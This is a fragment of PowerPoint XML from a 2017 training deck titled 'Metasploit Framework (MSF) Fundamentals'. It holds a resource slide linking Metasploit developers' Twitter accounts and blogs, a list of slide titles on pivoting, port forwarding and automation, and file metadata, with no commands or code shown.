              <a:t> (James Lee, lead exploit developer/coder for MSF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://twitter.com/jduck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Josh Drake, former exploit developer for MSF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hermit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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twitter.com/hermit_hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://www.cryptolingus.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9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10"/>
              </a:rPr>
              <a:t>https://www.stackattack.net/blog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10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08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yptolingus_Presentation_Template" id="{A6F52B2C-CD49-C145-9E18-FB3C371D529E}" vid="{43F7E467-A391-6A43-8D79-0BC74E9324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Cryptolingus_Presentation_Template</Template>
  <TotalTime>7489</TotalTime>
  <Words>1186</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>132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Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Metasploit Framework (MSF) Fundamentals</vt:lpstr>
      <vt:lpstr>Topics</vt:lpstr>
      <vt:lpstr>Common Terminology</vt:lpstr>
      <vt:lpstr>Common Terminology (continued)</vt:lpstr>
      <vt:lpstr>Quick Review</vt:lpstr>
      <vt:lpstr>Pivoting</vt:lpstr>
      <vt:lpstr>Pivoting (continued)</vt:lpstr>
      <vt:lpstr>Pivoting (continued)</vt:lpstr>
      <vt:lpstr>Port Forwarding</vt:lpstr>
      <vt:lpstr>Port Forwarding (cont.)</vt:lpstr>
      <vt:lpstr>Port Forwarding (cont.)</vt:lpstr>
      <vt:lpstr>Automation</vt:lpstr>
      <vt:lpstr>Automation</vt:lpstr>
      <vt:lpstr>Automation</vt:lpstr>
      <vt:lpstr>Automation</vt:lpstr>
      <vt:lpstr>Automation</vt:lpstr>
      <vt:lpstr>Automation (Ruby Resource)</vt:lpstr>
      <vt:lpstr>Automation</vt:lpstr>
      <vt:lpstr>Automation</vt:lpstr>
      <vt:lpstr>Automation</vt:lpstr>
      <vt:lpstr>Automation</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Additional Resources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Metasploit Framework (MSF) Fundamentals</dc:title>
  <dc:creator>Brian Mork</dc:creator>
  <cp:lastModifiedBy>Brian Mork</cp:lastModifiedBy>
  <cp:revision>70</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-01-17T16:14:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-20T05:06:43Z</dcterms:modified>
</cp:coreProperties>
</file>